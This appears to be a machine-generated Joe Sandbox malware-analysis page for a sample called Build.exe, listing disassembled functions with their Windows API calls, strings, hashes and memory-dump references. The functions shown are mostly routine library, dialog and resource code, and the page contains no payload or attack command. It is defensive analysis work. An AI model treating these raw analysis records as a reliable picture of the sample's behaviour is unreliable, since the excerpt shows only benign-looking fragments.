Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: _wcslen$_wcsrchr
String ID: .exe$.rar$.sfx
API String ID: 3513545583-31770016
Opcode ID: 65d9f1686cf5e7cf4c9271589214deb6d6d465fc1f88c04e041d5aa42d4ff593
Instruction ID: 5cfe76842e73f8cdab281b98af5de03f2e8d79bed774fceea5581ff4176a9883
Opcode Fuzzy Hash: 65d9f1686cf5e7cf4c9271589214deb6d6d465fc1f88c04e041d5aa42d4ff593
Instruction Fuzzy Hash: 0C414722700730D5C7326F32A852A3B73A4EF45708F91480FF981AB281E7AC5D82C35E

Function 0042DA1E Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 134COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0042DA59
GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,0042BD19,?,?,00000800,?,?,?,0042BCD4), ref: 0042DB02
_wcslen.LIBCMT ref: 0042DB70

Strings

\\?\, xrefs: 0042DA90, 0042DADC, 0042DB38, 0042DB87
UNC, xrefs: 0042DAE8

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: _wcslen$CurrentDirectory
String ID: UNC$\\?\
API String ID: 3341907918-253988292
Opcode ID: be51e56979e780473076a70205d0276f541919b0fc6fc0b6433712bfb1c0e950
Instruction ID: 325b2cdd2e729fbffc0453c8d03a0e66b263a532399de779d55c2d7d11bb2569
Opcode Fuzzy Hash: be51e56979e780473076a70205d0276f541919b0fc6fc0b6433712bfb1c0e950
Instruction Fuzzy Hash: E641EB31E0436166D620EB61AD81EFF77BCAF49744F81041FF884D3141E7ACA985C66E

Function 004210E0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00421136
_wcslen.LIBCMT ref: 0042115A
_wcslen.LIBCMT ref: 00421187
_wcslen.LIBCMT ref: 004211AC

Strings

%D, xrefs: 00421227

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: _wcslen
String ID: %D
API String ID: 176396367-1639211993
Opcode ID: 9c77c33bb8fa31e7fb12b6cbc0ba8438f0890fc140e583157c267ffebaae5023
Instruction ID: 3a0c92493acf5b0cee9f4d95c2774b10841dee165f4ff4e8c62d89f2c51d42f9
Opcode Fuzzy Hash: 9c77c33bb8fa31e7fb12b6cbc0ba8438f0890fc140e583157c267ffebaae5023
Instruction Fuzzy Hash: F441F5716047519BC725DF38C94599FBBE8FF85300F41092EF999E3250DB34E9058BAA

Function 0043D9DD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

LoadBitmapW.USER32(00000065), ref: 0043D9ED
GetObjectW.GDI32(00000000,00000018,?), ref: 0043DA12
DeleteObject.GDI32(00000000), ref: 0043DA44
DeleteObject.GDI32(00000000), ref: 0043DA67

Part of subcall function 0043C652: FindResourceW.KERNELBASE(?,PNG,00000000,?,?,?,0043DA3D,00000066), ref: 0043C665
Part of subcall function 0043C652: SizeofResource.KERNEL32(00000000,?,?,?,0043DA3D,00000066), ref: 0043C67C
Part of subcall function 0043C652: LoadResource.KERNEL32(00000000,?,?,?,0043DA3D,00000066), ref: 0043C693
Part of subcall function 0043C652: LockResource.KERNEL32(00000000,?,?,?,0043DA3D,00000066), ref: 0043C6A2
Part of subcall function 0043C652: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0043DA3D,00000066), ref: 0043C6BD
Part of subcall function 0043C652: GlobalLock.KERNEL32(00000000,?,?,?,?,?,0043DA3D,00000066), ref: 0043C6CE
Part of subcall function 0043C652: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0043C737
Part of subcall function 0043C652: GlobalUnlock.KERNEL32(00000000), ref: 0043C756
Part of subcall function 0043C652: GlobalFree.KERNEL32(00000000), ref: 0043C75D

Strings

], xrefs: 0043DA1A

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: GlobalResource$Object$BitmapDeleteLoadLock$AllocCreateFindFreeFromGdipSizeofUnlock
String ID: ]
API String ID: 1428510222-3352871620
Opcode ID: 469d5bb52f7ea19613ce28508bf91f9cf25664c5a440a84f5d4349524978dccb
Instruction ID: 5e9f7c72662fa05ad41062fac930c9f4f0b650411cfd7683a8ef82a320d64c23
Opcode Fuzzy Hash: 469d5bb52f7ea19613ce28508bf91f9cf25664c5a440a84f5d4349524978dccb
Instruction Fuzzy Hash: 4F01223290031167CB127765AD9AA7F3A79AF8AB55F24102AF804B7381DF39CC0597A8

Function 0043F950 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00421366: GetDlgItem.USER32(00000000,00003021), ref: 004213AA
Part of subcall function 00421366: SetWindowTextW.USER32(00000000,004565F4), ref: 004213C0

EndDialog.USER32(?,00000001), ref: 0043F99B
GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0043F9B1
SetDlgItemTextW.USER32(?,00000066,?), ref: 0043F9C5
SetDlgItemTextW.USER32(?,00000068), ref: 0043F9D4

Strings

RENAMEDLG, xrefs: 0043F968

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: RENAMEDLG
API String ID: 445417207-3299779563
Opcode ID: 08b8d06dafbbc562bb794eb245a66f201b2c403f22470ec23eab8d6ef3300f07
Instruction ID: 7c438bf1fde8b10bf49a956cddae9702f92f08a89e0fb5f148f9d99d49d04a61
Opcode Fuzzy Hash: 08b8d06dafbbc562bb794eb245a66f201b2c403f22470ec23eab8d6ef3300f07
Instruction Fuzzy Hash: EB012873A443107BD2114F289D08F6B775CFF5DB02F20583BF201A16D0C66A9909877E

Function 0044A6C5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044A676,?,?,0044A616,?,0045F7B0,0000000C,0044A76D,?,00000002), ref: 0044A6E5
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044A6F8
FreeLibrary.KERNEL32(00000000,?,?,?,0044A676,?,?,0044A616,?,0045F7B0,0000000C,0044A76D,?,00000002,00000000), ref: 0044A71B

Strings

CorExitProcess, xrefs: 0044A6F0
mscoree.dll, xrefs: 0044A6DE

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: cae55c68fb5500b5012c17584ed26db63e09899943120d8cab8292c7407b2269
Instruction ID: bda75254855bb22efac77e340d330b19562c4250933eb85278afa0c0c4cfec30
Opcode Fuzzy Hash: cae55c68fb5500b5012c17584ed26db63e09899943120d8cab8292c7407b2269
Instruction Fuzzy Hash: B3F0A430540208FBDF109FA0DC49B9EBFB5EB08747F51417AF905A32A1CB749D40CA89

Function 00421366 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 00430244: _swprintf.LIBCMT ref: 00430284
Part of subcall function 00430244: _strlen.LIBCMT ref: 004302A5
Part of subcall function 00430244: SetDlgItemTextW.USER32(?,00462274,?), ref: 004302FE
Part of subcall function 00430244: GetWindowRect.USER32(?,?), ref: 00430334
Part of subcall function 00430244: GetClientRect.USER32(?,?), ref: 00430340

GetDlgItem.USER32(00000000,00003021), ref: 004213AA
SetWindowTextW.USER32(00000000,004565F4), ref: 004213C0

Strings

pPF, xrefs: 0042137B
0, xrefs: 00421369
pPF, xrefs: 004213CB

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: ItemRectTextWindow$Client_strlen_swprintf
String ID: 0$pPF$pPF
API String ID: 2622349952-3706987565
Opcode ID: daf264b1b9ad543994e1265baa10fda4b630c99e5c5d2dc059b1a9d4881f21c5
Instruction ID: afefd7168dc7cd5d6d76ad5a97248f8284ec4a74354aff5fa536668136097086
Opcode Fuzzy Hash: daf264b1b9ad543994e1265baa10fda4b630c99e5c5d2dc059b1a9d4881f21c5
Instruction Fuzzy Hash: AFF0F43120425CA6EF054F62AC1CBEB3B6AAF14314F80812AFC45C0AB1D7BCC850DB18

Function 004451FA Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 004452C1
___AdjustPointer.LIBCMT ref: 004452E4
_abort.LIBCMT ref: 00445332
___AdjustPointer.LIBCMT ref: 00445380

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: AdjustPointer$_abort
String ID:
API String ID: 2252061734-0
Opcode ID: 38a5df3f82fc4c3f342f307c7d254d08c96561e524cb8ad0b79390a325a43ecf
Instruction ID: 61b28387374c51d5dc7604624a8d5518e42dc44532ce8a89c89d665251e8c740
Opcode Fuzzy Hash: 38a5df3f82fc4c3f342f307c7d254d08c96561e524cb8ad0b79390a325a43ecf
Instruction Fuzzy Hash: D051CF72601A06AFFF258F51D841B6BB3A4FF44744F24456FEC01872A2D7B9AC81CB98

Function 0044E580 Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0044E589
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044E5AC

Part of subcall function 0044BC8E: RtlAllocateHeap.NTDLL(00000000,?,?,?,00446A24,?,0000015D,?,?,?,?,00447F00,000000FF,00000000,?,?), ref: 0044BCC0

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044E5D2
_free.LIBCMT ref: 0044E5E5
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044E5F4

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: a5116b264accd3bd20897400218179be640d7d2341e81935be7be652eb4f73dd
Instruction ID: dfba8970cbc257210a61de2a3896fb615fd80a5669950e0032ccfed21deafeb3
Opcode Fuzzy Hash: a5116b264accd3bd20897400218179be640d7d2341e81935be7be652eb4f73dd
Instruction Fuzzy Hash: 2B01D4726016117F772157FB6C89C7B6A6DFEC2B69315012EB805C3202FE78CD0281B9

Function 0044BA29 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,0044BC80,0044D7D8,?,0044B9D3,00000001,00000364,?,0044688D,?,?,004650C4), ref: 0044BA2E
_free.LIBCMT ref: 0044BA63
_free.LIBCMT ref: 0044BA8A
SetLastError.KERNEL32(00000000,?,004650C4), ref: 0044BA97
SetLastError.KERNEL32(00000000,?,004650C4), ref: 0044BAA0

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 21607c22b4f971b4b0c3337e93b25925980b4ff67f81c0b98fcc366cf1ca5777
Instruction ID: 10c3a9f3c27c612d15862037eb093785c75e68df928e94cda59bee906284cc1e
Opcode Fuzzy Hash: 21607c22b4f971b4b0c3337e93b25925980b4ff67f81c0b98fcc366cf1ca5777
Instruction Fuzzy Hash: FC01F232100A016BA206E7765D8691B216DDBC077A321042BF405B2292EB6CCC0251AD

Function 00432FC9 Relevance: 7.5, APIs: 5, Instructions: 48COMMON

Download Yara Rule

APIs

Part of subcall function 004332AF: ResetEvent.KERNEL32(?), ref: 004332C1
Part of subcall function 004332AF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 004332D5

ReleaseSemaphore.KERNEL32(?,00000040,00000000,D72E4020,?,?,00000001,?,004552FF,000000FF,?,004343C0,?,00000000,?,00424766), ref: 00433007
CloseHandle.KERNEL32(?,?,?,004343C0,?,00000000,?,00424766,?,?,?,00000000,?,?,?,00000001), ref: 00433021
DeleteCriticalSection.KERNEL32(?,?,004343C0,?,00000000,?,00424766,?,?,?,00000000,?,?,?,00000001,?), ref: 0043303A
CloseHandle.KERNEL32(?,?,004343C0,?,00000000,?,00424766,?,?,?,00000000,?,?,?,00000001,?), ref: 00433046
CloseHandle.KERNEL32(?,?,004343C0,?,00000000,?,00424766,?,?,?,00000000,?,?,?,00000001,?), ref: 00433052

Part of subcall function 004330CA: WaitForSingleObject.KERNEL32(?,000000FF,004331E7,?,?,0043325F,?,?,?,?,?,00433249), ref: 004330D0
Part of subcall function 004330CA: GetLastError.KERNEL32(?,?,0043325F,?,?,?,?,?,00433249), ref: 004330DC

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
String ID:
API String ID: 1868215902-0
Opcode ID: b5b87b0ecf8b98e56690512464cf854d9683e6b6f02d82014a5401ec3edc9028
Instruction ID: add6761aad39f0beef1216847d1b9ac33330476378fb58b8924c44d160c17a55
Opcode Fuzzy Hash: b5b87b0ecf8b98e56690512464cf854d9683e6b6f02d82014a5401ec3edc9028
Instruction Fuzzy Hash: 69116172500744EFC722DF64DD84BC6BBB9FB08B12F41093AF166931A1CB75AA448B58

Function 0044EE4F Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0044EE67

Part of subcall function 0044BAFA: RtlFreeHeap.NTDLL(00000000,00000000,?,0044EEE6,?,00000000,?,00000000,?,0044EF0D,?,00000007,?,?,0044F30A,?), ref: 0044BB10
Part of subcall function 0044BAFA: GetLastError.KERNEL32(?,?,0044EEE6,?,00000000,?,00000000,?,0044EF0D,?,00000007,?,?,0044F30A,?,?), ref: 0044BB22

_free.LIBCMT ref: 0044EE79
_free.LIBCMT ref: 0044EE8B
_free.LIBCMT ref: 0044EE9D
_free.LIBCMT ref: 0044EEAF

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 6d0cc117b211f87e4786612f7dfad9df8f4ef31a70f29a6e99ef46203c900576
Instruction ID: 31badd0b3c6f7d2ae5da2148f7e750f63070772cd817e669af8fa0f2c0c4abb3
Opcode Fuzzy Hash: 6d0cc117b211f87e4786612f7dfad9df8f4ef31a70f29a6e99ef46203c900576
Instruction Fuzzy Hash: 6BF0FF32504600BFE664EB6BE585C9B77EAFA00710764081BF04DE7640DBF9FC808A9C

Function 0043D864 Relevance: 7.5, APIs: 5, Instructions: 38windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0043D875
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0043D886
IsDialogMessageW.USER32(00020494,?), ref: 0043D89A
TranslateMessage.USER32(?), ref: 0043D8A8
DispatchMessageW.USER32(?), ref: 0043D8B2

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: Message$DialogDispatchPeekTranslate
String ID:
API String ID: 1266772231-0
Opcode ID: f3a145894aad30c4a103e760faf8a4509042070002684b66d72e44e14f6d31c6
Instruction ID: 221a5618b760371e5fb176efe2101bd687877da7b905aed090f6809c5dbcc0aa
Opcode Fuzzy Hash: f3a145894aad30c4a103e760faf8a4509042070002684b66d72e44e14f6d31c6
Instruction Fuzzy Hash: EFF03072D01219ABDB20ABF5EC5CDEF7F7CEE062517008825F916D2140E728E505C7B4

Function 0043C79C Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 240COMMON

Download Yara Rule

APIs

Part of subcall function 0043C629: GetDC.USER32(00000000), ref: 0043C62D
Part of subcall function 0043C629: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0043C638
Part of subcall function 0043C629: ReleaseDC.USER32(00000000,00000000), ref: 0043C643

GetObjectW.GDI32(?,00000018,?), ref: 0043C7E0

Part of subcall function 0043CA67: GetDC.USER32(00000000), ref: 0043CA70
Part of subcall function 0043CA67: GetObjectW.GDI32(?,00000018,?), ref: 0043CA9F
Part of subcall function 0043CA67: ReleaseDC.USER32(00000000,?), ref: 0043CB37

Strings

(, xrefs: 0043C935
fD, xrefs: 0043C82F

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: ObjectRelease$CapsDevice
String ID: ($fD
API String ID: 1061551593-3754389792
Opcode ID: f5f830a00defec58d42a2d9a12f9f1c592c77ab2ffafae1bb619e4a333fd39c6
Instruction ID: 36ee40354f5a2aefce1e936b03e90d4cab75708336868fd850e8797402dc645f
Opcode Fuzzy Hash: f5f830a00defec58d42a2d9a12f9f1c592c77ab2ffafae1bb619e4a333fd39c6
Instruction Fuzzy Hash: 4191E4716083549FD610EF25C884E2BBBE8FF89705F10496EF48AE7261CB74E905CB66

Function 00433748 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 203COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00433910
_swprintf.LIBCMT ref: 004339BF

Strings

%s: %s, xrefs: 0043391F
%ls, xrefs: 00433795, 004337AB

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: _swprintf
String ID: %ls$%s: %s
API String ID: 589789837-2259941744
